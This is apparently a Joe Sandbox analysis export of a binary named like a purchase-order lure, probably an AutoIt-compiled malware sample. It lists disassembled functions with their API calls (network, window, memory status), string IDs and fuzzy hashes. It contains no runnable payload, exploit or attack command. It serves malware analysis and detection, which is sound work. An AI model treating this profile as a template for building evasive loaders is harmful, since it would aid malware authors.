                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID: >$DEFINE
                        • API String ID: 4104443479-1664449232
                        • Opcode ID: dddcc2e52b7359011d5195d1aade887d931d53f27691056e2d28e733baf3235d
                        • Instruction ID: 79ce6079d3fd4e73f5d79cfc0fe34fbd6d8e459d0288ac2130ae11bd05027a04
                        • Opcode Fuzzy Hash: dddcc2e52b7359011d5195d1aade887d931d53f27691056e2d28e733baf3235d
                        • Instruction Fuzzy Hash: 81126874A1020ADFCF25CF99C4D0AEDB7B1FF48350F26815AE849AB251D734AE95CB90
                        APIs
                        • OleSetContainedObject.OLE32(?,00000001), ref: 002EECA0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ContainedObject
                        • String ID: AutoIt3GUI$Container
                        • API String ID: 3565006973-3941886329
                        • Opcode ID: ac769bb5394edc477bae9c439d902a6bfb31986fc64a35e11055ddc17ba6a996
                        • Instruction ID: 72c285829972c472790b11e8548ae93283a87aa8e6053bfb7a9df1652db8f134
                        • Opcode Fuzzy Hash: ac769bb5394edc477bae9c439d902a6bfb31986fc64a35e11055ddc17ba6a996
                        • Instruction Fuzzy Hash: E79168746507029FDB14CF65C884B6ABBF9BF48710F65846EF84ACB291DBB0E851CB60
                        APIs
                          • Part of subcall function 002B3BCF: _wcscpy.LIBCMT ref: 002B3BF2
                          • Part of subcall function 002B84A6: __swprintf.LIBCMT ref: 002B84E5
                          • Part of subcall function 002B84A6: __itow.LIBCMT ref: 002B8519
                        • __wcsnicmp.LIBCMT ref: 002FE785
                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 002FE84E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                        • String ID: LPT
                        • API String ID: 3222508074-1350329615
                        • Opcode ID: ce74e90a5f1c1ff5f04cec3343933628693e347c62fc08e02525136788bc5b7b
                        • Instruction ID: 55fe7bf98e78437d913dca1c0eeb5abd332e3912ab45fee0a9307533ebc86bda
                        • Opcode Fuzzy Hash: ce74e90a5f1c1ff5f04cec3343933628693e347c62fc08e02525136788bc5b7b
                        • Instruction Fuzzy Hash: 22617375A20219AFDF15EF54C895EFEF7B4AF48390F014069F616AB2A0DB70AE50CB50
                        APIs
                        • Sleep.KERNEL32(00000000), ref: 002B1B83
                        • GlobalMemoryStatusEx.KERNEL32 ref: 002B1B9C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: GlobalMemorySleepStatus
                        • String ID: @
                        • API String ID: 2783356886-2766056989
                        • Opcode ID: 1a781124b82a235ae85788623a10a253b7e90a0441a107228f96aab7d34b049d
                        • Instruction ID: ccff0f78a1e14270889173e90a6b6a2dd6881749075ffc37b1707ab4a523b8bf
                        • Opcode Fuzzy Hash: 1a781124b82a235ae85788623a10a253b7e90a0441a107228f96aab7d34b049d
                        • Instruction Fuzzy Hash: A4514971418784ABE321AF14D885FABBBECFB95394F81484DF1C8410A6EF71856C8B56
                        APIs
                          • Part of subcall function 002B417D: __fread_nolock.LIBCMT ref: 002B419B
                        • _wcscmp.LIBCMT ref: 002FCF49
                        • _wcscmp.LIBCMT ref: 002FCF5C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _wcscmp$__fread_nolock
                        • String ID: FILE
                        • API String ID: 4029003684-3121273764
                        • Opcode ID: d7f361c81192b67362fe2fc88e807e3555a2635749219c09082af17b52aaa546
                        • Instruction ID: ffc74971bfb0d0df24f190851101b6f2307ece3983f145c0fd1a418a1e232cce
                        • Opcode Fuzzy Hash: d7f361c81192b67362fe2fc88e807e3555a2635749219c09082af17b52aaa546
                        • Instruction Fuzzy Hash: 0441E532A2021DBADF11EFA4CC81FEFBBB99F49750F10047AF605A7191D7719A548B60
                        APIs
                          • Part of subcall function 002D889E: __getptd_noexit.LIBCMT ref: 002D889E
                        • __getbuf.LIBCMT ref: 002D9B8A
                        • __lseeki64.LIBCMT ref: 002D9BFA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __getbuf__getptd_noexit__lseeki64
                        • String ID: pM.
                        • API String ID: 3311320906-850496965
                        • Opcode ID: 5b6645c268fd5bc7f8487476c48d39fa9f14dd8134cf0cdf4d08057ac107750d
                        • Instruction ID: e0f619c5f898e8fda68cee9a07b2e8d3ce40f5e962a3d77b634c926d6bedfc1f
                        • Opcode Fuzzy Hash: 5b6645c268fd5bc7f8487476c48d39fa9f14dd8134cf0cdf4d08057ac107750d
                        • Instruction Fuzzy Hash: 2541E071530B069ED7349F28D891A7A77E89B49324F15861FF4AA8B3D1D7B4DCA08F10
                        APIs
                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0031A668
                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0031A67D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: '
                        • API String ID: 3850602802-1997036262
                        • Opcode ID: d7657c856b1b8e217e071a65690292a59626f53ad800b645ff04cdf6bcb0b835
                        • Instruction ID: 9b3567940489f804b3b9ec3550dd7dcd7ec4ca829c224dcbd992e73dc578e9d7
                        • Opcode Fuzzy Hash: d7657c856b1b8e217e071a65690292a59626f53ad800b645ff04cdf6bcb0b835
                        • Instruction Fuzzy Hash: 11412875A01709AFDB15CF68C880BDA7BB9FF09341F14006AE959EB341D770A981CF91
                        APIs
                        • DestroyWindow.USER32(?,?,?,?), ref: 0031961B
                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00319657
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$DestroyMove
                        • String ID: static
                        • API String ID: 2139405536-2160076837
                        • Opcode ID: b27f46884ccba1da81b0b4848571809ba71a1561008f0794a93189fe31a778ba
                        • Instruction ID: e06b1a3be4fa8e5369820f44b5dc4cde213eba49c2c2ed9a9ed463e9b6e2b18b
                        • Opcode Fuzzy Hash: b27f46884ccba1da81b0b4848571809ba71a1561008f0794a93189fe31a778ba
                        • Instruction Fuzzy Hash: 3531CA31100604AAEB168F68DC91FFB73A9FF4C760F01861AF8A987190CA31AC918B60
                        APIs
                        • _memset.LIBCMT ref: 002F5BE4
                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002F5C1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: InfoItemMenu_memset
                        • String ID: 0
                        • API String ID: 2223754486-4108050209
                        • Opcode ID: 35f4412af0ffc6cc0d863da60c7caad933012aed5bd83da55dd381b2d7cc2594
                        • Instruction ID: bc13a98ec4bc4b49d9a156d74d42c27ddcafc40fb39e777246b49a497a9b3897
                        • Opcode Fuzzy Hash: 35f4412af0ffc6cc0d863da60c7caad933012aed5bd83da55dd381b2d7cc2594
                        • Instruction Fuzzy Hash: 4B31C53151071EABDB258F99D985BBDFBF8AF05390F18003AEB86961A0D7B09964CF50
                        APIs
                        • __snwprintf.LIBCMT ref: 00306BDD
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __snwprintf_memmove
                        • String ID: , $$AUTOITCALLVARIABLE%d
                        • API String ID: 3506404897-2584243854
                        • Opcode ID: 3e9a122f671d75187c24296d462cecbb39bd5aa907453cc7d19d0b6738749cad
                        • Instruction ID: 2a1b8e2ddd6bba671085c8bc3257862ffb0f63dcccd8034a03b6a3c100da006d
                        • Opcode Fuzzy Hash: 3e9a122f671d75187c24296d462cecbb39bd5aa907453cc7d19d0b6738749cad
                        • Instruction Fuzzy Hash: D7219131610118AACF02EF94CC92EED77B5EF44740F104469F546AB186DB71EE66CFA1
                        APIs
                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00319269
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00319274
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: Combobox
                        • API String ID: 3850602802-2096851135
                        • Opcode ID: f71d320159321c45050d6630a3fd060c335d76b66bc2053b6fb408c905a73f6f
                        • Instruction ID: 485b4ee33fdb1ee06cf6b2395add37ca0115392bf7bc9577640dd86dc100c58e
                        • Opcode Fuzzy Hash: f71d320159321c45050d6630a3fd060c335d76b66bc2053b6fb408c905a73f6f
                        • Instruction Fuzzy Hash: A611937160020CBFEF2A8E54DC91FEB37AEEB8D3A4F114525F91897290D671DC918BA0
                        APIs
                          • Part of subcall function 002CC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002CC657
                          • Part of subcall function 002CC619: GetStockObject.GDI32(00000011), ref: 002CC66B
                          • Part of subcall function 002CC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 002CC675
                        • GetWindowRect.USER32(00000000,?), ref: 00319775
                        • GetSysColor.USER32(00000012), ref: 0031978F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                        • String ID: static
                        • API String ID: 1983116058-2160076837
                        • Opcode ID: f4d06603a8b2944eba5e017aab4932c0002388538849736afc148cbb01bfc4ce
                        • Instruction ID: 7c0c427acdb3be9371e44a2daca12416d056bb8a73f5b7ecd9b6333b86dd523a
                        • Opcode Fuzzy Hash: f4d06603a8b2944eba5e017aab4932c0002388538849736afc148cbb01bfc4ce
                        • Instruction Fuzzy Hash: 45115972520209AFDB05DFB8DC46EFA7BA8EF08304F055529F956D3280D735E891DB50
                        APIs
                        • GetWindowTextLengthW.USER32(00000000), ref: 003194A6
                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003194B5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: LengthMessageSendTextWindow
                        • String ID: edit
                        • API String ID: 2978978980-2167791130
                        • Opcode ID: a01f99c71ece5bd69f56da3e64d5203acf9c1a1b596da373c8e5ef83b849a522
                        • Instruction ID: 8c54148238d9d910c9e0d6a2b9586176a70fc79c721e68d2f5393408841cb3ac
                        • Opcode Fuzzy Hash: a01f99c71ece5bd69f56da3e64d5203acf9c1a1b596da373c8e5ef83b849a522
                        • Instruction Fuzzy Hash: 7111BF71100104AFEB168E65DC91FEB376DEB09374F614725F965971D0CB31DC929B60
                        APIs
                        • _memset.LIBCMT ref: 002F5CF3
                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 002F5D12
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: InfoItemMenu_memset
                        • String ID: 0
                        • API String ID: 2223754486-4108050209
                        • Opcode ID: c899533ca4a4b4bb39663a7178e1f8567f034bcecbdd8440f3373425a659acb8
                        • Instruction ID: 95137340f4e46f7db8fc28281d4cee131acc36db8ce26824b8f9bda215da2f38
                        • Opcode Fuzzy Hash: c899533ca4a4b4bb39663a7178e1f8567f034bcecbdd8440f3373425a659acb8
                        • Instruction Fuzzy Hash: 08118172922A2DABDB21DE5CD848BA9B7E99B06384F190032EB56EB190D3709D14C791
                        APIs
                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0030544C
                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00305475
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Internet$OpenOption
                        • String ID: <local>
                        • API String ID: 942729171-4266983199
                        • Opcode ID: eb8a0b1a0a49cd3f6663b5b13ce929b29e7f16f3805165296094671770e71a57
                        • Instruction ID: 106206a581b569a7a72c44b701d2fb3f7ffc551cfc98f1593466428d77350c55
                        • Opcode Fuzzy Hash: eb8a0b1a0a49cd3f6663b5b13ce929b29e7f16f3805165296094671770e71a57
                        • Instruction Fuzzy Hash: 6211C670542A21BADB168F528CA4EFBFB6CFF12752F10812AF54556480E37059C0CEF0
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002E4557
                        • ___raise_securityfailure.LIBCMT ref: 002E463E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: FeaturePresentProcessor___raise_securityfailure
                        • String ID: (7
                        • API String ID: 3761405300-3289126152
                        • Opcode ID: 6efb089a5a1cd9edc1b725fd3711b1e0424167d08f7171f36880d94c75dc61ac
                        • Instruction ID: 1fb3590d87d77a3e4243f3a5bd26614f9985e4ecd29cc6750382c79ce32372e4
                        • Opcode Fuzzy Hash: 6efb089a5a1cd9edc1b725fd3711b1e0424167d08f7171f36880d94c75dc61ac
                        • Instruction Fuzzy Hash: D621E4B5550B04DBD72ADF65EA95640BBA8BB4C310F50582AE50DCBBA0E3F069D0CF45
                        APIs
                        • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0030ACF5
                        • htons.WSOCK32(00000000,?,00000000), ref: 0030AD32
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: htonsinet_addr
                        • String ID: 255.255.255.255
                        • API String ID: 3832099526-2422070025
                        • Opcode ID: 23695a86ce3b555a8676c6893bbc84800939583e85ba4c0dda9f6923e3f38b59
                        • Instruction ID: 409680a1af5fb86a666c6692e34513d29cc3e4345599b08c958cf807bbc2b71c
                        • Opcode Fuzzy Hash: 23695a86ce3b555a8676c6893bbc84800939583e85ba4c0dda9f6923e3f38b59
                        • Instruction Fuzzy Hash: 9E01F535200705ABCB11AFA4E8A6FEDB368FF14720F108526F6159B6D1D771E810CB65
                        APIs
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 002EC5E5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 1456604079-1403004172
                        • Opcode ID: 9c348a7ce4e906a502acc30809599c32a89342802ea51d3574ffe6773bf0fdc0
                        • Instruction ID: 28e8e0412d46b6f23a6b3fd8c88f5a05cbeebd93d9608d06890cbf713206a308
                        • Opcode Fuzzy Hash: 9c348a7ce4e906a502acc30809599c32a89342802ea51d3574ffe6773bf0fdc0
                        • Instruction Fuzzy Hash: 6D01F571661159ABCB04EFA5CC529FF376AAF02350BA40619F462A72C1DF7068299B50
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __fread_nolock_memmove
                        • String ID: EA06
                        • API String ID: 1988441806-3962188686
                        • Opcode ID: 513f12fa6e15aa4f2d6722ec577d88db52462062a2409dbcd9b347d4c4163a67
                        • Instruction ID: 4c83512e4c9dee74d1ae381bc482299484785ea9490c7a65b0b2fbf9032efbec
                        • Opcode Fuzzy Hash: 513f12fa6e15aa4f2d6722ec577d88db52462062a2409dbcd9b347d4c4163a67
                        • Instruction Fuzzy Hash: 1E01F9719542586EDB18D798C816FFEBBF89B15711F00415BE153D2181E5B4A718CB60
                        APIs
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 002EC4E1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 1456604079-1403004172
                        • Opcode ID: 853634974a0019b466e9ab0ecb56d8a8a72cb8e2a52188c7862bae82d14667f8
